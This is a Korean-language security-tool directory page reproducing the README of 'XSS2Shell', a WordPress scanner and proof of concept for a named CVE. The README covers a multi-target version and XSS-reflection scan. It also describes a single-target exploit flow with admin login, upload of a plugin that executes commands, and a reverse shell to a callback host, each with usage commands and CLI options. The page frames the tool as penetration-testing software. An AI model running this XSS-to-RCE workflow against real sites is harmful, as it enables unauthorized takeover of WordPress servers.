Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XSS2Shell-CVE-2026-64638 — 여러 대상을 동시에 처리하며 버전 핑거프린팅, 반사형 XSS 탐지를 수행하고, 승인된 테스트를 위한 인증된 XSS-to-RCE 익스플로잇 워크플로우를 지원하는 WordPress 보안 스캐너입니다. | Kitploit
도구/GitHubGitHub/mr-leonardogomes/xss2shell-cve-2026-64638
ReconnaissanceWeb Vulnerability ScannersExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubmr-leonardogomes/xss2shell-cve-2026-64638

XSS2Shell-CVE-2026-64638

여러 대상을 동시에 처리하며 버전 핑거프린팅, 반사형 XSS 탐지를 수행하고, 승인된 테스트를 위한 인증된 XSS-to-RCE 익스플로잇 워크플로우를 지원하는 WordPress 보안 스캐너입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
161개월 전아직 검토되지 않음

🔍 @Mr-LeonardoGomes

💀 XSS2Shell-CVE-2026-64638

Versão 2026 Status Ativo PRs Bem-vindos Licença MIT
Feito com amor Bug Bounty 2026 Pentest Metodologia

2026년 버그 헌팅 방법론

XSS2Shell 다중 타깃 스캐너

개발자: 크레딧: YogaGymn

승인된 WordPress 보안 테스트를 위한 PoC/스캐닝 유틸리티입니다. 이 프로젝트는 단일 타깃에 대한 익스플로잇 흐름과 동시 다중 타깃 스캔 전용 모드를 포함합니다.

중요: 이 프로젝트는 본인이 소유하거나 테스트에 대한 명시적 승인을 받은 WordPress 설치에서만 사용하십시오. 다중 타깃 스캐너는 의도적으로 버전 식별과 XSS 반사 탐지로 제한되며, 타깃 목록에 대해 자격 증명 캡처, 플러그인 업로드 또는 RCE를 수행하지 않습니다.

기능

단일 타깃 모드

원본 스크립트는 다음을 지원합니다:

  • WordPress 버전 식별.
  • XSS 반사 탐지.
  • auto, xss 및 direct 모드.
  • WordPress 직접 인증 및 플러그인 업로드 흐름.
  • 원본 PoC에 포함된 XSS 체인 기능.
  • 원본 PoC에 포함된 선택적 콜백/리버스 셸 기능.

다중 타깃 모드

추가된 스캐너는 다음을 지원합니다:

  • 텍스트 파일에서 타깃 읽기.
  • 중복 타깃 제거.
  • ThreadPoolExecutor를 사용한 동시 스캐닝.
  • 설정 가능한 worker 수.
  • WordPress 버전 탐지.
  • XSS 반사 탐지.
  • 진행 상황 보고.
  • 입력 파일과 동일한 순서로 저장되는 결과.
  • 요약 통계.

다중 타깃 모드는 원본 RCE 함수를 호출하지 않습니다.

요구 사항

  • Python 3.9+
  • requests

의존성을 설치하십시오:

root@kitploit:~
python3 -m pip install requests

Linux 배포판에서 외부 관리형 Python 환경을 사용하는 경우, 가상 환경을 사용하십시오:

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install requests

설치

프로젝트를 클론하거나 복사하십시오: yogaGymn 익스플로잇 원본

root@kitploit:~
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638

또는 간단히 다음 파일을:

root@kitploit:~
xss2shell.py

작업 디렉터리에 넣으십시오.

다중 타깃 스캐너

targets.txt OU alvos.txt라는 이름의 파일을 만드십시오:

root@kitploit:~
https://example1.test
https://example2.test
https://example3.test

주석과 빈 줄은 무시됩니다:

root@kitploit:~
# Alvos de laboratório autorizado
https://example1.test

https://example2.test

스캐너를 실행하십시오:

root@kitploit:~
python3 xss2shell.py -i targets.txt

기본 동시성은 10개 worker입니다.

동시성 변경

예를 들어, 20개 worker를 사용하려면:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 20

소규모 실습 환경의 경우:

root@kitploit:~
python3 xss2shell.py -i targets.txt --workers 5

불필요하게 높은 workers 수를 선택하지 마십시오. 연결 부하가 증가하여 속도 제한(rate limit) 또는 방어적 제어가 트리거될 수 있습니다.

출력 파일 변경

root@kitploit:~
python3 xss2shell.py \
  -i targets.txt \
  --workers 10 \
  --output results.txt

출력 예시

root@kitploit:~
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE

[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)

=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected  : 1
Not detected  : 2
Errors        : 0
Results saved : scan_results.txt

결과 형식

기본 scan_results.txt는 탭으로 구분된 필드를 사용합니다:

root@kitploit:~
TARGET  WORDPRESS_VERSION  XSS_STATUS  XSS_DETAIL

예시:

root@kitploit:~
https://example1.test    6.8.2    XSS_NOT_DETECTED          ESCAPED
https://example2.test    6.7.1    XSS_REFLECTION_DETECTED   AREA_BYPASS

XSS 상태 값


상태 의미


XSS_REFLECTION_DETECTED 스캐너가 테스트된 HTML 반사 동작을 탐지했습니다. 이는 그 자체만으로 RCE를 입증하지는 않습니다.

XSS_NOT_DETECTED 테스트된 반사(reflection)가 탐지되지 않았습니다.

ERROR 검사 중 예외가 발생했습니다.

XSS 세부 값

스캐너는 다음과 같은 세부 값을 보고할 수 있습니다:

  • RAW_HTML
  • AREA_BYPASS
  • ESCAPED
  • STRIPPED
  • NOT_REFLECTED

이 값들은 탐지 루틴이 관찰한 응답을 설명합니다. 결과를 확인된 취약점으로 간주하기 전에 수동으로 검증해야 합니다.

단일 타깃 사용

원본 스크립트는 단일 타깃 인수도 지원합니다.

자동 모드

root@kitploit:~
python3 xss2shell.py \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

직접 모드

root@kitploit:~
python3 xss2shell.py \
  --mode direct \
  -u admin \
  -p 'PASSWORD' \
  http://authorized-target.test

XSS 모드

root@kitploit:~
python3 xss2shell.py \
  --mode xss \
  --lhost 192.0.2.10 \
  http://authorized-lab.test

XSS/직접 워크플로우는 명령 실행 기능을 포함하는 플러그인을 생성하거나 활성화할 수 있습니다. 승인된 테스트 환경에서만 사용하십시오.

CLI 참조

root@kitploit:~
usage: xss2shell.py [-h]
       [-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
       [--mode {auto,xss,direct}]
       [-u USERNAME] [-p PASSWORD]
       [--lhost LHOST] [--lport LPORT]
       [--slug SLUG] [--callback-port CALLBACK_PORT]
       [--no-rev]
       [target]

인수


인수 설명


target 단일 타깃 URL.

-i, --input 여러 타깃이 포함된 파일.

--output 다중 타깃 결과용 출력 파일. 기본값: scan_results.txt.

--workers 동시 worker 수. 기본값: 10.

--mode 원본 단일 타깃 모드: auto, xss 또는 direct.

-u, --username 원본 직접/대체(fallback) 워크플로우용 WordPress 사용자 이름.

-p, --password 원본 직접/대체 워크플로우용 WordPress 비밀번호.

--lhost 원본 PoC용 콜백/리버스 셸 호스트.

--lport 리버스 셸 포트. 기본값: 4444.

--slug 플러그인 슬러그. 기본값: xss2shell.

--callback-port 콜백 서버 포트. 기본값: 9090.

--no-rev 원본 워크플로우에서 리버스 셸 트리거를 건너뜁니다.

동시 스캐닝 작동 방식

다중 타깃 모드는 다음과 같은 Python 기능을 사용합니다:

root@kitploit:~
ThreadPoolExecutor

각 타깃은 독립적인 스캔 작업으로 제출됩니다:

root@kitploit:~
targets.txt
     |
     v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ... 
+----+----+----+----+
  |    |    |    |
  v    v    v    v
 WP   WP   WP   WP
 XSS  XSS  XSS  XSS
  |    |    |    |
  +----+----+----+
        |
        v
   scan_results.txt

결과는 작업이 완료되는 대로 수집되며, 최종 출력은 원래 타깃 순서에 따라 생성됩니다.

범위 및 보안

다중 타깃 모드는 승인된 보안 평가와 실습 환경을 위해 설계되었습니다.

권장 워크플로우:

  1. 서면 승인을 받으십시오.
  2. 승인된 도메인/IP만 targets.txt 파일에 포함하십시오.
  3. 적은 수의 workers(실행 프로세스)로 시작하십시오.
  4. 스캐너 출력을 분석하십시오.
  5. 관련 발견 사항을 수동으로 검증하십시오.
  6. 증거와 수정 조치를 문서화하십시오.

허가 없이 제3자 시스템에 스캐너를 사용하지 마십시오.

제한 사항

이 스캐너는 완전한 취약점 평가 도구가 아닙니다.

특히:

  • 탐지된 HTML 반사가 악용 가능한 XSS 취약점의 존재를 자동으로 입증하지는 않습니다.
  • 공개 엔드포인트에서 얻은 WordPress 버전은 누락되었거나 부정확할 수 있습니다.
  • unknown(알 수 없음) 상태는 타깃이 취약하다는 의미가 아닙니다.
  • 네트워크 오류로 인해 불완전한 결과가 생성될 수 있습니다.
  • WAF/CDN 동작은 탐지에 영향을 줄 수 있습니다.
  • 스캐너는 다중 타깃 모드에서 악용 가능성 또는 RCE 가능 여부를 판단하지 않습니다.
  • 취약점을 보고하기 전에 결과를 수동으로 확인해야 합니다.

프로젝트 구조

root@kitploit:~
.
├── xss2shell.py
├── targets.txt
└── scan_results.txt

라이선스

제공된 소스 코드에는 라이선스 정보가 없었습니다.

이 프로젝트를 공개적으로 게시하는 경우 LICENSE와 같은 명시적 라이선스 파일을 추가하십시오. 이 코드는 ZSecurity 원본 코드의 후속 개발물입니다.

도구 다운로드